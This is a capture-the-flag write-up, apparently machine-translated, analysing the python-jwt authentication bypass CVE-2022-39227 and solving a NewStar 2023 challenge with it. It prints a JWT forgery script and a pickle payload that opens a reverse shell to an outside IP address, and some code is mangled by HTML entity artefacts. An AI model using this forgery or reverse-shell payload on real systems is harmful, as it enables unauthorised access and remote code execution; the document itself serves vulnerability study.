Remember CVE-2022-39227-Python-JWT vulnerability

Article directory

  • Preface
  • Affected versions
  • Vulnerability analysis
  • Newstar2023 Week5
  • Summarize

Foreword

Master Asal1n casually said that there was a CVE like Xiangyun Cup on newstar week 5, so I ran to check it out. It was indeed a CVE vulnerability that I didn’t know about, so I learned python from this question. -The authentication bypass vulnerability in the jwt library, and I did a simple code analysis.

Affected versions

python-jwt < 3.3.4

Vulnerability Analysis

The cause of this vulnerability is more likely to be caused by the library author’s negligence when writing the code, so that the verified payload content and the returned payload content are not caused by the same payload. Let’s briefly analyze it below.

First, give the approximate payload of the author’s vulnerability patch on github, and use the payload to test, as follows:
python-jwt library address

from json import *
from python_jwt import *
from jwcrypto import jwk

payload = {<!-- -->'role': "guest"}
key = jwk.JWK.generate(kty='oct', size=256)
jwt_json = generate_jwt(payload, key, 'HS256', timedelta(minutes=60))
[header, payload, signature] = jwt_json.split('.')
parsed_payload = loads(base64url_decode(payload))
parsed_payload['role'] = "admin"
fake = base64url_encode((dumps(parsed_payload,separators=(',', ':'))))#The separators here just eliminate the spaces, and not adding them does not seem to affect the vulnerability.
fake_jwt = '{" ' + header + '.' + fake + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature": "' + signature + '"}'
print(fake_jwt)
token = verify_jwt(fake_jwt, key, ['HS256'])
print(token)
  1. The first is just entering the previous code.
# Determine whether there is an available signature algorithm
    if allowed_algs is None:
        allowed_algs = []
#If the available signature algorithms are not a list, throw an exception
    if not isinstance(allowed_algs, list):
        # jwcrypto only supports list of allowed algorithms
        raise _JWTError('allowed_algs must be a list')
#Split the three parts of jwt with .
    header, claims, _ = jwt.split('.')
#Take out the header part for base64 decoding and json parsing
    parsed_header = json_decode(base64url_decode(header))
#Take out the alg parameter in the header algorithm, here is PS256. If it is empty or the algorithm is not allowed, an exception will be thrown.
    alg = parsed_header.get('alg')
    if alg is None:
        raise _JWTError('alg header not present')
    if alg not in allowed_algs:
        raise _JWTError('algorithm not allowed: ' + alg)
#ignore_not_implemented defaults to False. It traverses the header keys and whether they are supported by JWS. Throwing exceptions is not supported.
    if not ignore_not_implemented:
        for k in parsed_header:
            if k not in JWSHeaderRegistry:
                raise _JWTError('unknown header: ' + k)
            if not JWSHeaderRegistry[k].supported:
                raise _JWTError('header not implemented: ' + k)
#Verify the signature and parse the jwt. The jwt passed in here is the original jwt field.
    if pub_key:
        token = JWS()
        token.allowed_algs = allowed_algs
        token.deserialize(jwt, pub_key)

Here base64url_decode() is a function used to decode Base64 URL security encoding.
Base64 URL safe encoding takes the standard Base64 encoding with some modifications so that it does not create conflicts when transmitted in URLs.
Specifically, it replaces “+” with “-“, replaces “/” with “_”, removes the trailing “=”, and ignores characters that are not base64.

  1. Enter deserialize to verify the signature. The code is as follows:
 def deserialize(self, raw_jws, key=None, alg=None):
        self.objects = {<!-- -->}
        o = {<!-- -->}
        try:
            try:
#Perform json parsing on the incoming original jwt
                djws = json_decode(raw_jws)
#Determine whether there are multiple signatures, and if so, take out the signatures and store them in the list
                if 'signatures' in djws:
                    o['signatures'] = []
                    for s in djws['signatures']:
                        os = self._deserialize_signature(s)
                        o['signatures'].append(os)
                        self._deserialize_b64(o, os.get('protected'))
#In the case of a single signature, take the signature field directly from the original jwt, and assign the protected and header values to the o object and return it
                else:
                    o = self._deserialize_signature(djws)
                    self._deserialize_b64(o, o.get('protected'))#Whether to continue base64 decoding

                if 'payload' in djws:#Parse the payload field
                    if o.get('b64', True):
                        o['payload'] = base64url_decode(str(djws['payload']))
                    else:
                        o['payload'] = djws['payload']

            except ValueError: #If there is an exception in json parsing, split it directly with . and extract the three parts and assign them separately.
                c = raw_jws.split('.')
                if len(c) != 3:
                    raise InvalidJWSObject('Unrecognized'
                                           ' representation') from None
                p = base64url_decode(str(c[0]))
                if len(p) > 0:
                    o['protected'] = p.decode('utf-8')
                    self._deserialize_b64(o, o['protected'])
                o['payload'] = base64url_decode(str(c[1]))
                o['signature'] = base64url_decode(str(c[2]))

            self.objects = o #Assign o to the objects object

        except Exception as e: # pylint: disable=broad-except
            raise InvalidJWSObject('Invalid format') from e

        if key:
            self.verify(key, alg)#Pass the signature algorithm and key into the verify function

file

file

  1. The verify() function is as follows:
 def verify(self, key, alg=None, detached_payload=None):
        self.verifylog = []
#The default verification is failed
        self.objects['valid'] = False
        obj = self.objects
        missingkey=False
        if 'signature' in obj:
            payload = self._get_obj_payload(obj, detached_payload)#Directly extract the payload part
            #Up to this point, the incoming parsing part is still the original normal jwt string, so _verify also passes, and the verification is set to true.
try:
                self._verify(alg, key,
                             payload,
                             obj['signature'],
                             obj.get('protected', None),
                             obj.get('header', None))
                obj['valid'] = True
            except Exception as e: # pylint: disable=broad-except
                if isinstance(e, JWKeyNotFound):
                    missingkey=True
                self.verifylog.append('Failed: [%s]' % repr(e))
#Multiple signatures
        elif 'signatures' in obj:
            payload = self._get_obj_payload(obj, detached_payload)
            for o in obj['signatures']:
                try:
                    self._verify(alg, key,
                                 payload,
                                 o['signature'],
                                 o.get('protected', None),
                                 o.get('header', None))
                    # Ok if at least one verifies
                    obj['valid'] = True
                except Exception as e: # pylint: disable=broad-except
                    if isinstance(e, JWKeyNotFound):
                        missingkey=True
                    self.verifylog.append('Failed: [%s]' % repr(e))
        else:
            raise InvalidJWSSignature('No signatures available')
#If the signature verification fails, throw an exception
        if not self.is_valid:
            if missingkey:
                raise JWKeyNotFound('No working key found in key set')
            raise InvalidJWSSignature('Verification failed for all '
                                      'signatures' + repr(self.verifylog))

The token after the verification code here is actually the original normal jwt, and has nothing to do with the forged payload.

file

  1. The code continues to go down
#json parsing. The divided middle part is the payload we have constructed.
 parsed_claims = json_decode(base64url_decode(claims))
#Get some time parameters
    utcnow = datetime.utcnow()
    now = timegm(utcnow.utctimetuple())
#Get the type JWT from the header and make some judgments without throwing an exception for JWT
    typ = parsed_header.get('typ')
    if typ is None:
        if not checks_optional:
            raise _JWTError('typ header not present')
    elif typ != 'JWT':
        raise _JWTError('typ header is not JWT')
#Get the iat value, which is the timestamp, from the fake payload to determine whether the token issuance time is valid.
    iat = parsed_claims.get('iat')
    if iat is None:
        if not checks_optional:
            raise _JWTError('iat claim not present')
    elif iat > timegm((utcnow + iat_skew).utctimetuple()):
        raise _JWTError('issued in the future')
#Get the validity time of the jwt token and whether it is valid at this time
    nbf = parsed_claims.get('nbf')
    if nbf is None:
        if not checks_optional:
            raise _JWTError('nbf claim not present')
    elif nbf > now:
        raise _JWTError('not yet valid')
# Get the expiration date of the token, which is the validity deadline, and determine whether the token is valid. If it is less than the current time, it will expire.
    exp = parsed_claims.get('exp')
    if exp is None:
        if not checks_optional:
            raise _JWTError('exp claim not present')
    elif exp <= now:
        raise _JWTError('expired')
# Return. The divided header and middle part are our fakepayload
    return parsed_header, parsed_claims

It can be seen that the normal JWT is used when verifying the token, but the middle part and header of the incoming jwt separated by . are returned, so that the returned payload and verification are parsed The signed pauload is not a payload, leading to identity bypass.

Newstar2023 Week5

The source code for the question is as follows:

# -*- coding: utf-8 -*-
import base64
import string
import random
from flask import *
import jwcrypto.jwk as jwk
import pickle
from python_jwt import *

app = Flask(__name__)


def generate_random_string(length=16):
    characters = string.ascii_letters + string.digits # Contains letters and numbers
    random_string = ''.join(random.choice(characters) for _ in range(length))
    return random_string


app.config['SECRET_KEY'] = generate_random_string(16)
key = jwk.JWK.generate(kty='RSA', size=2048)


@app.route("/")
def index():
    payload = request.args.get("token")
    if payload:
        token = verify_jwt(payload, key, ['PS256'])
        print(token)
        session["role"] = token[1]['role']
        return render_template('index.html')
    else:
        session["role"] = "guest"
        user = {<!-- -->"username": "boogipop", "role": "guest"}
        jwt = generate_jwt(user, key, 'PS256', timedelta(minutes=60))
        return jwt


@app.route("/pickle")
def unser():
    if session["role"] == "admin":
        pickle.loads(base64.b64decode(request.args.get("pickle")))
        return 'success'
    else:
        return 'fail'


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000, debug=True)

The idea of the question is also very simple. By forging JWT, the role and admin in the second part of the returned fake_payload are then pickled and deserialized.

  1. Use the jwwt of the original title guest to directly forge and bypass identity verification.

file

from json import loads, dumps
from jwcrypto.common import base64url_encode, base64url_decode


def topic(topic):
    [header, payload, signature] = topic.split('.')
    parsed_payload = loads(base64url_decode(payload))
    print(parsed_payload)
    parsed_payload["role"] = "admin"
    print(dumps(parsed_payload, separators=(',', ':')))
    fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
    print(fake_payload)
    return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":" ' + signature + '"} '


print(topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2OTkzNjkyMzcsImlhdCI6MTY5OTM2NTYzNywianRpIjoiTUV0SEJKX1JZeVR3MmhnUmZMcnFsdyIsIm5iZiI6MTY5OTM2NTYzN ywicm9sZSI6Imd1ZXN0IiwidXNlcm5hbWUiOiJib29naXBvcCJ9.nw0s5c4lL0GtUBb7IJTbIhVTE7kzNg7s4l93PrhWZmYKuxWCyZmi7cKWE63Tv3Z6sdUQVp_7IlM8yiY32mNSOwRHCAD WllFo18bmlXVri_qdWR-CCVkVi6npIliEBXl_Hbpnh64dCIQuY13-gr0Y412svenGADO-uubqxT3Ml7dlpnaDZ7F06ISkg_m4syc0DQpKKuQv4xFshMYHgaxCCkLpJCMHScIxSjSjoxpD3LnNjYRXgVue8R4Tc Z75ZWgaSmkNUmHUrizdTFyi0GVutnaT1Nw4yZKkS5DZxAVUYqcARLUSGvWmt1pZnyny0eR23q7Z8X7Mw-LytE-XfmkAFQ'))


  1. The session returned here is the admin’s session.

file

  1. Trigger pickle deserialization and rebound shell
import base64

p=b"(cos\
system\
S'bash -c "bash -i > & amp; /dev/tcp/120.79.29.170/5555 0> & amp;1"'\
o"
payload=base64.b64encode(p)
print(payload)

file

Summary

The topic of JWT is always endless, including some null authentication, array bypass in nodejs, etc., and loopholes are also frequent.